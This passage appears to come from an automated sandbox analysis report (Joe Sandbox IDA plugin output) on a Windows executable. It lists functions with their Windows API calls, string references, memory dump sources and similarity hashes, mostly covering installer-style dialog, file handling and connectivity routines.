                                                                                                                • String ID: < Back$Cancel$Help$IDS_CTRL_BUTTON_BACK$IDS_CTRL_BUTTON_CANCEL$IDS_CTRL_BUTTON_HELP$IDS_CTRL_BUTTON_NEXT$Next >
                                                                                                                • API String ID: 3243491680-298686068
                                                                                                                • Opcode ID: 2c72c62cae1d5018aff026f11301bb40ff7173ace604c7562fd34bdc8b5b7b12
                                                                                                                • Instruction ID: 8c301571b7883f3645e14ba8901b0c362cf74ec3eff5d7f916d91cd58e861c36
                                                                                                                • Opcode Fuzzy Hash: 2c72c62cae1d5018aff026f11301bb40ff7173ace604c7562fd34bdc8b5b7b12
                                                                                                                • Instruction Fuzzy Hash: D42188B4724705B7DF08AB5AC917ADEBEB5AF85B24F10420EF011632D2CBB41B4485EB
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00420614
                                                                                                                • __ftol.LIBCMT ref: 00420626
                                                                                                                • IsWindow.USER32(?), ref: 0042065E
                                                                                                                • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 00420687
                                                                                                                • SendMessageA.USER32(?,00000144,?,00000000), ref: 004206B1
                                                                                                                • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 004206CA
                                                                                                                • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 004206D6
                                                                                                                • SendMessageA.USER32(?,00000144,00000000,00000000), ref: 004206EB
                                                                                                                • IsWindow.USER32(?), ref: 0042074E
                                                                                                                • InvalidateRect.USER32(?,-00000018,00000001), ref: 0042076C
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window__ftol$H_prologInvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1719125992-0
                                                                                                                • Opcode ID: 7cb3b3f9666ef157e19739827c140fd9d8d5d45e013193b0e25331d8bfe78057
                                                                                                                • Instruction ID: 2ffe84984871c3027cda14e9c8aa56fe3210c7d7d31b05157b291f12c7be0fd5
                                                                                                                • Opcode Fuzzy Hash: 7cb3b3f9666ef157e19739827c140fd9d8d5d45e013193b0e25331d8bfe78057
                                                                                                                • Instruction Fuzzy Hash: 0951FF70B00204AFDB10AF65DC81FAEB7F9EF84354F10416AF511AB2A2C775ED018B18
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00430133
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                                                • GetProcAddress.KERNEL32(00000000,MsiGetUserInfoA), ref: 00430190
                                                                                                                  • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen$AddressLibraryLoadProc
                                                                                                                • String ID: 0:R$CompanyName$MsiGetUserInfoA$SerialNumber$UserInfoState$UserName
                                                                                                                • API String ID: 730962311-3475145488
                                                                                                                • Opcode ID: 7f0b15c74f45c1c9e5d229d7ea6c56fc69b28669e9096641a4cc24df1d0bf3d7
                                                                                                                • Instruction ID: f48231176893b2492514ed4d13078f1dd229c1fbd4f959c36a3ee04a97692080
                                                                                                                • Opcode Fuzzy Hash: 7f0b15c74f45c1c9e5d229d7ea6c56fc69b28669e9096641a4cc24df1d0bf3d7
                                                                                                                • Instruction Fuzzy Hash: DD716C75C00119BACF01BBE2DC82EEEBB78AF15358F14402FF50172152DB385A86DB69
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0043054B
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00430574
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                • __ftol.LIBCMT ref: 0043059D
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                                                • GetProcAddress.KERNEL32(00000000,MsiGetFeatureInfoA), ref: 004305CA
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftol$AddressLibraryLoadProclstrlen
                                                                                                                • String ID: 0:R$Description$MsiGetFeatureInfoA$Title
                                                                                                                • API String ID: 3912782950-3107902656
                                                                                                                • Opcode ID: 60b113825be5c55a71079dc5045074bde9deb5e34e198a30927c29871f399671
                                                                                                                • Instruction ID: e824c5e08e4226fd8a53abed4c9ed5df991b82728ac6f6a208ea35d8e8fdfac0
                                                                                                                • Opcode Fuzzy Hash: 60b113825be5c55a71079dc5045074bde9deb5e34e198a30927c29871f399671
                                                                                                                • Instruction Fuzzy Hash: 05518D76800219AACF01FBE5DC82EEEBB78EF19308F14412FF50172192DB385B459B69
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00444A0A
                                                                                                                • GetFileAttributesA.KERNEL32(?,00510870,?,?,?,?,00000000), ref: 00444A23
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,00000000), ref: 00444A86
                                                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,00000000), ref: 00444A97
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00444B16
                                                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00444B1F
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 004451DB: __EH_prolog.LIBCMT ref: 004451E0
                                                                                                                  • Part of subcall function 004451DB: RemoveDirectoryA.KERNEL32(?,00000000,?,00000000,0000005C,?,00000000,?,?,?,?,00000000), ref: 00445299
                                                                                                                Strings
                                                                                                                • Failed to set source file attribute to normal durign move, xrefs: 00444B51
                                                                                                                • Failed to delete file after copy, xrefs: 00444B2F
                                                                                                                Similarity
                                                                                                                • API ID: File$Attributes$DeleteH_prolog$DirectoryIncrementInterlockedRemove
                                                                                                                • String ID: Failed to delete file after copy$Failed to set source file attribute to normal durign move
                                                                                                                • API String ID: 460680484-3602874778
                                                                                                                • Opcode ID: d40d654c7fae012e60810f84a58d5e0f736b23fdc4226d12b632200870eda356
                                                                                                                • Instruction ID: d70e420914a337e0fe442d1616408a22ebf8e0ec7083ef759637baa88477e379
                                                                                                                • Opcode Fuzzy Hash: d40d654c7fae012e60810f84a58d5e0f736b23fdc4226d12b632200870eda356
                                                                                                                • Instruction Fuzzy Hash: 3841B574A00705ABEF14EF65C846BAE7BA5EF84354F10411FF506A7281CB78EB418B9A
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004ACAC6
                                                                                                                • VariantClear.OLEAUT32(?), ref: 004ACB6B
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004ACBEC
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004ACBFB
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004ACC0A
                                                                                                                • VariantClear.OLEAUT32(?), ref: 004ACC14
                                                                                                                • VariantClear.OLEAUT32(?), ref: 004ACC25
                                                                                                                  • Part of subcall function 004AC2EA: __EH_prolog.LIBCMT ref: 004AC2EF
                                                                                                                  • Part of subcall function 004AC2EA: VariantClear.OLEAUT32(00000007), ref: 004AC843
                                                                                                                  • Part of subcall function 004AC2EA: VariantClear.OLEAUT32(?), ref: 004ACA50
                                                                                                                  • Part of subcall function 004A704F: VariantCopy.OLEAUT32(?,?), ref: 004A7057
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Clear$FreeString$H_prolog$Copy
                                                                                                                • String ID: `5w
                                                                                                                • API String ID: 3345578691-4151700305
                                                                                                                • Opcode ID: b4554ffb9450bab719ed45a6d922262881c082f72bee86d12f6ed75e7d70831e
                                                                                                                • Instruction ID: d3263be15b4144360796143ba88861a41a262f4f81409c292a14040a6c174df0
                                                                                                                • Opcode Fuzzy Hash: b4554ffb9450bab719ed45a6d922262881c082f72bee86d12f6ed75e7d70831e
                                                                                                                • Instruction Fuzzy Hash: 64516A71D00209EFDB14CFA8D885BEEBBB8FF19314F10412AE116A7291D779A940CF68
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(005265C0,00526124,00000000,?,005265C0,?,004D48E8,00526124,00000000), ref: 004D468B
                                                                                                                • RtlEnterCriticalSection.NTDLL(005265DC), ref: 004D46DA
                                                                                                                • RtlLeaveCriticalSection.NTDLL(005265DC), ref: 004D46ED
                                                                                                                • LocalAlloc.KERNEL32(00000000,00000004,?,004D48E8,00526124,00000000), ref: 004D4703
                                                                                                                • LocalReAlloc.KERNEL32(?,00000004,00000002,?,004D48E8,00526124,00000000), ref: 004D4715
                                                                                                                • TlsSetValue.KERNEL32(005265C0,00000000,004D48E8,00526124,00000000), ref: 004D4751
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocCriticalLocalSectionValue$EnterLeave
                                                                                                                • String ID: $aR$jGM
                                                                                                                • API String ID: 4117633390-4204794069
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004BB803,?,Microsoft Visual C++ Runtime Library,00012010,?,004EFDD4,?,004EFE24,?,?,?,Runtime Error!Program: ), ref: 004C0B09
                                                                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004C0B21
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004C0B32
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004C0B3F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                • API String ID: 2238633743-4044615076
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004541F9
                                                                                                                  • Part of subcall function 00453857: IsWindow.USER32(00000000), ref: 0045386E
                                                                                                                • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 00454257
                                                                                                                • SendMessageA.USER32(?,0000018A,?,00000000), ref: 00454287
                                                                                                                • SendMessageA.USER32(?,00000189,?,00000000), ref: 004542A1
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 004542F8
                                                                                                                • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 0045431E
                                                                                                                • SendMessageA.USER32(?,0000018A,?,00000000), ref: 0045434E
                                                                                                                • SendMessageA.USER32(?,00000189,?,00000000), ref: 00454368
                                                                                                                  • Part of subcall function 004C6329: lstrlen.KERNEL32(?,00000100,004C9C79,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,00000000,?), ref: 004C633C
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 00412607: __EH_prolog.LIBCMT ref: 0041260C
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 004543BF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$H_prolog$IncrementInterlockedWindowlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2349895815-0
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0045446A
                                                                                                                • SendMessageA.USER32(?,0000018A,00000000,00000000), ref: 004544EA
                                                                                                                • SendMessageA.USER32(?,00000189,00000000,00000000), ref: 00454504
                                                                                                                • SendMessageA.USER32(?,00000187,00000000,00000000), ref: 00454520
                                                                                                                • SendMessageA.USER32(?,00000199,00000000,00000000), ref: 0045453C
                                                                                                                  • Part of subcall function 0044E274: __EH_prolog.LIBCMT ref: 0044E279
                                                                                                                • SendMessageA.USER32(?,0000018A,00000000,00000000), ref: 004545A4
                                                                                                                • SendMessageA.USER32(?,00000189,00000000,00000000), ref: 004545BE
                                                                                                                  • Part of subcall function 004C6329: lstrlen.KERNEL32(?,00000100,004C9C79,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,00000000,?), ref: 004C633C
                                                                                                                • SendMessageA.USER32(?,00000187,00000000,00000000), ref: 004545E8
                                                                                                                • SendMessageA.USER32(?,00000199,00000000,00000000), ref: 00454604
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$H_prolog$IncrementInterlockedlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2120755305-0
                                                                                                                APIs
                                                                                                                • LCMapStringW.KERNEL32(00000000,00000100,004EF9B4,00000001,00000000,00000000,00000100,00000001,000000FF,00000000,00000000,?), ref: 004B8351
                                                                                                                • LCMapStringA.KERNEL32(00000000,00000100,004EF9B0,00000001,00000000,00000000), ref: 004B836D
                                                                                                                • LCMapStringA.KERNEL32(000000FF,00000000,00000000,?,00000000,00000000,00000100,00000001,000000FF,00000000,00000000,?), ref: 004B83B6
                                                                                                                • MultiByteToWideChar.KERNEL32(000000FF,00000002,00000000,?,00000000,00000000,00000100,00000001,000000FF,00000000,00000000,?), ref: 004B83EE
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 004B8446
                                                                                                                • LCMapStringW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000), ref: 004B845C
                                                                                                                • LCMapStringW.KERNEL32(000000FF,00000000,?,00000000,?,?), ref: 004B848F
                                                                                                                • LCMapStringW.KERNEL32(000000FF,00000000,?,?,?,00000000), ref: 004B84F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$ByteCharMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 352835431-0
                                                                                                                APIs
                                                                                                                • SendMessageA.USER32(?,00000182,-00000001,00000000), ref: 004546DE
                                                                                                                • SendMessageA.USER32(?,00000181,-00000001,00000000), ref: 004546EF
                                                                                                                • SendMessageA.USER32(?,00000187,-00000001,00000000), ref: 00454719
                                                                                                                • SendMessageA.USER32(?,00000186,000000FF,00000000), ref: 0045472E
                                                                                                                • SendMessageA.USER32(?,0000019A,-00000001,00000000), ref: 00454762
                                                                                                                  • Part of subcall function 00453EB2: SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 00453ED2
                                                                                                                • SendMessageA.USER32(?,00000182,-00000001,00000000), ref: 00454775
                                                                                                                • SendMessageA.USER32(?,00000181,-00000001,00000000), ref: 00454786
                                                                                                                • SendMessageA.USER32(?,00000187,-00000001,00000000), ref: 004547B0
                                                                                                                • SendMessageA.USER32(?,00000186,000000FF,00000000), ref: 004547C5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046860E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0045FB75: __EH_prolog.LIBCMT ref: 0045FB7A
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prologInterlocked$DecrementIncrementlstrlen
                                                                                                                • String ID: %s > %s$0:R$On Back$On Cancel$On Help$On Next
                                                                                                                • API String ID: 3783261227-3723365219
                                                                                                                • Opcode ID: 886a2aaaa35b24a325c86b528aa1779a57df5c881d486d016d814d32710fbc01
                                                                                                                • Instruction ID: 4a944c17b1db028109ee92335c23cff89e74410a1f1551bbe9654ec97abeb5b7
                                                                                                                • Opcode Fuzzy Hash: 886a2aaaa35b24a325c86b528aa1779a57df5c881d486d016d814d32710fbc01
                                                                                                                • Instruction Fuzzy Hash: 61818FB4910609EFCF04EF65C942B9EBFA5AB14354F10811EF41597282DB78AA84CBE6
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004249DE
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00424A04
                                                                                                                  • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                                                • IsWindow.USER32(?), ref: 00424B24
                                                                                                                • InvalidateRect.USER32(?,-00000018,00000001), ref: 00424B42
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$DecrementInterlockedInvalidateRectWindow__ftol
                                                                                                                • String ID: Enabled$Text$Visible
                                                                                                                • API String ID: 824419852-1258828939
                                                                                                                • Opcode ID: f1604e143b49883e08f8ac970c3f999ad7a6e04ecdffdc8a3e5f9872e46123e8
                                                                                                                • Instruction ID: ec221e6b636f2f9c9309ce8fbb00bb3c8a3b3a2293596e8070ffde19f9e81158
                                                                                                                • Opcode Fuzzy Hash: f1604e143b49883e08f8ac970c3f999ad7a6e04ecdffdc8a3e5f9872e46123e8
                                                                                                                • Instruction Fuzzy Hash: 9F41D7315055217BDB05BB25DC42EEE376D9F46334F24070FF421A62E2DF68A642876D
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0044076B
                                                                                                                  • Part of subcall function 004409F9: LoadLibraryA.KERNEL32(WININET.DLL,?,?,00440790), ref: 00440A01
                                                                                                                  • Part of subcall function 004409F9: LoadLibraryExA.KERNEL32(WININET.DLL,00000000,00000008,?,?,00440790), ref: 00440A11
                                                                                                                  • Part of subcall function 004409F9: GetProcAddress.KERNEL32(00000000,InternetGetConnectedState), ref: 00440A23
                                                                                                                  • Part of subcall function 004409F9: FreeLibrary.KERNEL32(00000000,?,?,00440790), ref: 00440A35
                                                                                                                  • Part of subcall function 0046DD73: __EH_prolog.LIBCMT ref: 0046DD78
                                                                                                                  • Part of subcall function 00418F0C: InternetGetConnectedState.WININET(?,00000000), ref: 00418F30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$H_prologLoad$AddressConnectedFreeInternetProcState
                                                                                                                • String ID: ConnectionConfigured$ConnectionOffline$LAN$Modem$Proxy$RASInstalled
                                                                                                                • API String ID: 3464404234-2123537113
                                                                                                                • Opcode ID: 561aa836a7cd165691d6d3fc28e3f5a06834101098228694d44e986da3cbb941
                                                                                                                • Instruction ID: d4d41e27ece3cff33f9e7cf8186adbb85cae721fa484dd9027bdff4aac6ebe26
                                                                                                                • Opcode Fuzzy Hash: 561aa836a7cd165691d6d3fc28e3f5a06834101098228694d44e986da3cbb941
                                                                                                                • Instruction Fuzzy Hash: 4C416D71842524BADB11BBA69C42FDF6A2DAF46388F14045FF511711A2DB3C16438BAE
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00458BE5
                                                                                                                • IsWindow.USER32(?), ref: 00458C04
                                                                                                                • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 00458C68
                                                                                                                • SendMessageA.USER32(?,0000018A,?,00000000), ref: 00458CB0
                                                                                                                • SendMessageA.USER32(?,00000189,?,00000000), ref: 00458CCC
                                                                                                                • SendMessageA.USER32(?,00000187,?,00000000), ref: 00458CE5
                                                                                                                • SendMessageA.USER32(?,00000199,?,00000000), ref: 00458D02
                                                                                                                • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 00458D5C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$H_prologWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1863169253-0
                                                                                                                • Opcode ID: 7cdb58cdf524f8178d40fcfd4c9e84f8ae0e6b8f4abedf3c9c72a08a7c67b03d
                                                                                                                • Instruction ID: 753e9bdcde3031a014c8fbe5bb206665f992e0f0f9cefbdd741adcbba1772d3d
                                                                                                                • Opcode Fuzzy Hash: 7cdb58cdf524f8178d40fcfd4c9e84f8ae0e6b8f4abedf3c9c72a08a7c67b03d
                                                                                                                • Instruction Fuzzy Hash: 4541B630600245AFDB15EFA1CC91FAEB775BF50305F14856EE502AA1E2CF799949CB14
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 004C81B8
                                                                                                                • BeginDeferWindowPos.USER32(00000008), ref: 004C81C6
                                                                                                                • GetTopWindow.USER32(?), ref: 004C81D8
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 004C81E7
                                                                                                                • SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 004C8219
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 004C8222
                                                                                                                • CopyRect.USER32(?,?), ref: 004C823E
                                                                                                                Memory Dump Source
